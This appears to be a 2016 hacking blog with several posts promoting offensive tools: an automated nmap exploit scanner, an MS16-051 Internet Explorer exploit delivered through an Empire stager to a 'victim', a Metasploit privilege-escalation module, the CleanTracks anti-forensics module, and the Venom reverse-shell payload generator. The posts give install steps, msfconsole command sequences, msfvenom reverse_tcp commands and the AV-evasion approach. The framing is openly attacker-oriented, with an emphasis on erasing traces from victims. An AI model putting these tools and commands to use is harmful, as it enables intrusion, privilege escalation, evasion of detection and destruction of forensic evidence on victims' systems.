Sunday, 25 September 2016

Nmapii - Its All About Saving The Time

           ,      No comments   
Hey !! Past few days of mine were been pretty lazy, only some raps and coffee kept me alive during nights while working on my projects (some choices i have other than security B| )  :}

Anyways :P apart from being lazy i was working on a tool called 'Nmapii' for making nmap automated its not like normal nmap scanner like scanning for OS and ports, but i've engaged some custom nse scripts to do some scans on other services and exploits (also i've used some default ones too).

yeap it saves time cuz all you need is to select the scan type you want to begin with.

So nmapii is coded in python. as its best for instant code generation also quite fast at prompting results :| (sorry for being noobish)

[Nmapii - Main]


[Nmapii - Help]

[Nmapii - About]

Yea that was a shamless part :P but everyone do it :P anyways lets move on

[Nmapii - Scans user can perform]

[Nmapii - In Action]


[Some Other Details ]

Custom NSE engaged :

(i) PHPIPAM :

References:
Vendor: http://phpipam.net/
Vuln Discover: http://0day.today/exploit/25375
Module Author: https://sourceforge.net/u/peterubuntu10/profile/

(ii) MS15-034 :

Reference :
MS Security Bulletin : https://technet.microsoft.com/en-us/library/security/ms15-034.aspx
Module Author :https://sourceforge.net/u/peterubuntu10/profile/

{LOGS}

You can easily get all logs about your scans in /home/.nmappi-logs
All scans are particularly categorised in individual dir

[Installation]

 1. git clone http://github.com/ChaitanyaHaritash/nmapii

2. cd ../path/nmapii/utils

3. sudo bash install.sh

4. sudo python nmapii.py

[Video Demo]



Feel Free to modify :) its an opensource project.

Special thanks to : r00t 3xp10it & VIRkid thx bros ;D 
Greets to : SSA [Suspicious Shell Activity] & HSH [Hell Shield Hackers]
And shit for haters :V


         
                        

Saturday, 17 September 2016

MS16-051 with in Empire

                No comments   
Powershell Expire has been a great asset for those who wanna develop exploits in python and merge into some exploit handlers other than MSF/ExploitPack.

So today's post is for an exploit which has been in heat from last couple of months as i've read lots of post about it.
Also its been used in some famous exploitkits. Like recently it was been observed in neutrino exploitkit.

Yeap its 'MS16-051' Exploit which is also known as 'internet explorer vbscript_godmode exploit'.

Its available in Empire too. you can download stager from here 

So lets start...... :D


[Installing EMPIRE And Adding New Stager]

Done with git clone


Lets add our stager 'ms16_051' to /Empire/lib/stager and hit install.sh in /Empire/setup/install.sh .
Install apache2 if u dont have , i hope everyone have it as mostly testers uses pentsting distros. So i left this onto you.


[Get Everything Ready]

Listener is all set 


Setting our stager up and get out output html file :)  


So everything setup here :) now lets wait our victim to click the link pointed to our apache :) 

[Personally Observed ]

As i searched on internet for IE6 test of this exploit, i didn't found a single post related to it. So I gave this exploit a try in IE6 too :P LOL it worked there too.  






Saturday, 3 September 2016

MSI_privilege_escalation (MSF module for privilege escalation in windows)

           ,      No comments   
Sup guys ? hope u all doin well :)

Today's post is about a module SSA just completed about a week ago. This module is all bout privilege escalation in win based sessions on metasploit :)

So lets start :)

-- What is Privilege escalation ? 

Privilege escalation is the act of exploiting a bug, design flaw or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user. The result is that an application with more privileges than intended by the application developer or system administrator can perform unauthorized actions.
                                                                                                                                  (WikiPedia)

 -- [Module Discription]



-- [ Installation ]

 Download module from following link : https://sourceforge.net/p/msf-auxiliarys/repository/ci/master/tree/MSI_privilege_escalation.rb

 now copy&paste it to following msf path : 
ubuntu : /opt/metasploit-framework/modules/post/windows/escalate/
kali : /path/metaploit/modules/post/windows/escalate/

 now load msfconsole and type following commands 
msf > reload_all
msf > use post/windows/escalate/MSI_privilege_escalation
msf post(MSI_privilege_escalation) > info


 -- [ Module Advanced Options ]



-- WorkFlow of Module (config required setting)

 'GET_SYSTEM' allows users to elevate current session (client) to nt authority/system. using impersonate tokens. 


'MSI_ESCALATION' allows users to CHECK/SET 'AlwaysInstallElevated' registry keys remottly. If the reg key its allready set to dword:1 in target system, then this funtion will warn attacker
that the bypass its allready active. (so no further need to change reg key data again).

dword:0 keys are set to dword:1. Bypassed :)


'REVERT_PRIVS' allows users to set 'AlwaysInstallElevated' registry keys to default (dword:0). Now here attacker can set all setting to old default ones as well :) 




--- General Errors 

This is common error ppl might encounter with. nothing wrong with module. The reason is mostly might be using old version of metasploit. So replace the class name to the default class name your MSF using(Current one is MetasploitModule) and it work right like it should be :)



-- [Video Demo]


[Credits]

'r00t-3xp10it' =>  post-module author
  Inspiration: Ben Campbell | Parvez Anwar
  Module debug: Chaitanya [ SSA RedTeam ]

Thursday, 12 May 2016

CleanTracks - MSF Auxiliary For Anti-Forensics

           ,      No comments   
Hello everyone, Hope everyone's fine :) Today, im gonna discuss about a Anti-Forensics module in metasploit coded by r00t 3xp10it - SSA

We often hacks our targets using metasploit but after we completes the exploitation do we notice that if the victim could call forensics guys to get the attacker ?

Metasploit doesn't has any module to do anti forensics job, CleanTracks is designed to remove traces often left by attacker in victim system and completes job without leaving any string leading to attacker :)

-- [IDEA]

As metasploit framework long time user i realized that in actual database does not exist any module that covers your tracks efficiently (in a forensic data breach investigation) after a successfully exploitation. Looking at the actual database we can only find two 'meterpreter' modules that help us in your task: 'clearev' that clears the Applications, System and Security logs on a Window system (event viewer) and 'timestomp' to manipulate the MACE (Modified, Accessed, Changed) times of a file/appl (windows systems)...
 

-- [ So, Basically  how does clean tracks works ? ]


Actually CleanTracks removes all logs in windows system stage by stage and also uses timestomp modules to change last accessed of files like cmd.exe , rundll32.exe , USER32.exe.
CleanTracks is simple to use and is used like all the other modules by setting required credentials like session id. In metasploit db there are only 2 modules (clearev , timestomp) which currently supports anti-forensics but not in much critical level like Cleantracks do.

-- [Advanced Options]


-- [ Different Functions In CleanTracks To Remove All Traces ]


1. Prevent : Will elevate the privilege to "Administrator" and will get you the privilege of
                  NT AUTHORITY\SYSTEM to the backdoor or payload. Also it'll prevent creation of                         footprints on victim system. By adding some regedit keys to it.

               

2. Cleaner : clear temp/prefetch folders, flushdns cache, clear eventlogs, shellbags, lnk, tmp, dat, etc,                     this module should be run befor leaving the current session



3. timestomp : This step won't be working as like timestomp in normal msf :) actually its just                                       automatically change the last modified and created dates of some files like cmd.exe
                        but it won't be changing the last accessed/used date and time because cmd is            
                        constantly used by cleantracks to execute commands by attacker.



4. getsys : getprivs API call to elevate current session to nt authority/system, its advice to run it                            before running any of the stages describe above.
   
                 

5.  Mace Blank MACE values in target inputed directory OR sysmace blank MACE values in target system32 directory, this option will change the MACE attributes of all files to null values inside the sellected directory

                     

6. revert : Revert regedit policies to default values, this option will reverse all registry keys added by CleanTracks.rb stage1 option.

       

7. logoff : logoff target machine (optional, more effective).

           



-- [INSTALLING CLEANTRACKS]


for ubuntu/debian users save file in /opt/metasploit-framework/modules/auxiliary/analyze/ :) and in CleanTracks.rb change class MetasploitModule to  Metasploit3 :) otherwise some compatibility issue may rise while reloading all modules :)) (i've experienced it) :P
 
Download clean tracks from here

 meterpreter > background
 msf exploit(handler) > reload_all
 msf exploit(handler) > use auxiliary/analyze/CleanTracks
 msf post(CleanTracks) > info
 msf post(CleanTracks) > show options
 msf post(CleanTracks) > show advanced options
 msf post(CleanTracks) > set [option(s)]
 msf post(CleanTracks) > exploit

-- [SOME EXPLOITING EXAMPLES]


Stage 1 :

 msf post(CleanTracks) > set getsys true
 msf post(CleanTracks) > set prevent true
 msf post(CleanTracks) > exploit

                                                                       
Before using prevent function ....


Prevent successfully launched :)



Regedit keys changed ;)



Stage2 :

 msf post(CleanTracks) > unset getsys
 msf post(CleanTracks) > set cleaner true
 msf post(CleanTracks) > exploit


Cleaner successfully launched ;)



timestomp :

 msf post(CleanTracks) > unset getsys
 msf post(CleanTracks) > unset cleaner
 msf post(CleanTracks) > set  dirmace Path_to_folder
 msf post(CleanTracks) > exploit

Before using function

Function executed Successfully

Proof Of Concept ;)


                                                         CleanTracks - Anti-forensics auxiliary
                                                     Supporters : Betto Avalos [debugging],
                                                        Chaitanya [debugging], Spirit [debugging]


Sunday, 13 March 2016

Venom 1.0.11 - Automatic Shellcode Generator

           ,      No comments   
Venom 1.0.11 - Automatic Shellcode Generator 

 Hi Guys , Its so long I have not posted. So today I'm gonna talk about a multi shellcode generator known as "Venom". Yeah its called as venom because some part of its played by a well known tool of Metasploit "Msfvenom".  Venom was developed by  r00t-3xp10it and concept was by Chaitanya. This exploiter took about 5 months to be completed but finally its public now.




Anyways, First of all I wanna put some light on term called "Shellcode" and what it is?  
In computer security , a shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called "shellcode" because it typically starts a command shell from which the attacker can control the compromised machine, but any piece of code that performs a similar task can be called shellcode. Because the function of a payload is not limited to merely spawning a shell, some have suggested that the name shellcode is insufficient. However, attempts at replacing the term have not gained wide acceptance. Shellcode is commonly written in machine code. 
                                                                                                                                             -- Wikipedia 
So now thing is, we can find so many shellcodes on shellstrom,0day.today,exploit-db,etc links then why we need Venom especially?    

As the term defines tool (Automatic shellcode generator), It generates some shellcodes using msfvenom 
But it requires learning long commands and consumes time. But in Venom it provides you several choices of what kind of payload it could generate. Also its noob friendly. Select your payload type and you are ready to roll. 
The main goal of this tool its not to build 'FUD' payloads!... But to give to its users the first glance of how shellcode is build, embedded into one template (any language), obfuscated/crypted (e.g pyherion.py) and compiled into one executable file format.  the goal of this project its to show how the shellcode works, and also to show that tools like veil-evasion, powersploit, unicorn uses msfvenom to build shellcode, i've tried to show all stages from the construction of shellcode, hoping to explain how things were made by others and what techniques they have used, and to show that many of these projects are truely communitary (automated) projects … 



Lets Understand Working of Venom …  

 First of all ... installing Venom's Dependencies and also it checks wheather they are installed if yes then properly or not. Here setup.sh in directory .../venom/aux/ can manage installing all dependencies like zenity,msfconsole,wine,pyinstaller,migw32 ,etc with just one run.

 [ DEPENDENCIES ]
Zenity | Metasploit | GCC (compiler) | Pyinstaller (python-to-exe)
mingw32 (compile .EXE executables) | pyherion.py (crypter)
PEScrambler.exe (PE obfuscator/scrambler) | apache2 | wine/winrar
vbs-obfuscator | encrypt_PolarSSL | ettercap (dns_spoof)


Now Setup.sh did it work , lets move to venom.sh in directory /venom/venom.sh
This is main file where you decides with which payload you should start or what payload you need.




Disclaimer about venom prompting before main menu appearance. that "Author doesn't holds any responsibility for any bad use of Venom, Remember that attacking targets without prior consent is illegal"

Main menu of Venom where you can select in what format u need your shellcode to be compiled. there are 17 choices. Some are FUD as well. But as told above this tool isn't meant to make stub FUD, its for education purpose only that how shellcode works.
lets dive more deep into venom's working .....

How Venom Works Basically ??


The script will use msfvenom (metasploit) to generate shellcode in diferent 
formats ( c | python | ruby | dll | msi | hta-psh ) injects the shellcode generated into one template (example: python) "the python funtion will execute the shellcode in ram" and uses compilers like: gcc (gnu cross compiler) or mingw32 or pyinstaller to build the executable file and also starts a multi-handler to recive the remote connection (reverse shell or meterpreter session).
.
'shellcode generator' tool reproduces some of the technics used by Veil-Evasion framework, unicorn.py, powersploit, etc,etc,etc.. "P.S. some payloads are undetectable by AV soluctions... yes!!!" one of the reasons for that its the use of a funtion to execute the 2ยบ stage of shell/meterpreter directly into targets ram.

How Venom Actually Builds Shellcode? 


The default way to generate a windows binarie payload (.exe)
using msfvenom is achieved through the -f flag (Output format)
msfvenom -p payload-name LHOST=127.0.0.1 LPORT=666 -f exe -o payload.exe
But msfvenom allow us to build shellcode in diferent formats
like: asp, aspx, aspx-exe, dll, elf, exe, exe-small, hta-psh
macho, osx-app, psh, vba, vba-exe, vba-psh, vbs, bash, c
java, perl, powershell, python, ruby, sh, vbscript.
The complete list can be accessed using the follow command:
sudo msfvenom --help-formats
now lets generate a simple shellcode to windows/shell/reverse_tcp
chosing powershell as output format "note that we will not use
the flag -o (Save the payload) option, this way the shellcode
generated will only displays in current terminal windows".

Using powershell as output format:
msfvenom -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=666 -f powershell

Using java as output format:
msfvenom -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=666 -f java

Using hex as output format:
msfvenom -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=666 -f hex

[ Some Useful Links ]
Venom tutorials : https://www.youtube.com/user/MrPedroubuntu
Venom tuto2 : https://www.youtube.com/channel/UCZAVZ79MVA6wWOv1VPkVm7g
Git : https://sourceforge.net/p/crisp-shellcode-generator/wiki/Home/
Metasploit : http://metasploit.com/

Usage :


git clone git://git.code.sf.net/p/crisp-shellcode-generator/shell crisp-shellcode-generator-shell venom cd venom/aux

bash setup.sh

After installing all dependencies

./venom.sh Updates: cd venom git pull origin master If Broken you can download Mirror Manually at: http://sourceforge.net/code-snapshots/git/c/cr/crisp-shellcode-generator/shell.git/crisp-shellcode-generator-shell-a4bd07df390856096dc2788d46b9838c60bd1c28.zip

[ SPECIAL THANKS/CREDITS TO ]:
HD Moore (metasploit father) | Nick Harbour (PEScrambler.exe)
@harmj0y (pyherion) | @G0tmi1k @chris truncker @harmj0y (ruby_stager)
ReL1K (pyinstaller) | astr0baby (reflective fud dll injection method)
0entropy (powershell poc's) | Matthew Graeber (powershell poc's)
alor&naga (ettercap) | Liviu (encrypt_polarSSL) | Chaitanya Haritash (debugging & Channelizing to concept) |
Suriya Prakash (debugging/recording tutorials)| and offcourse r00t-3xp10it  ^_^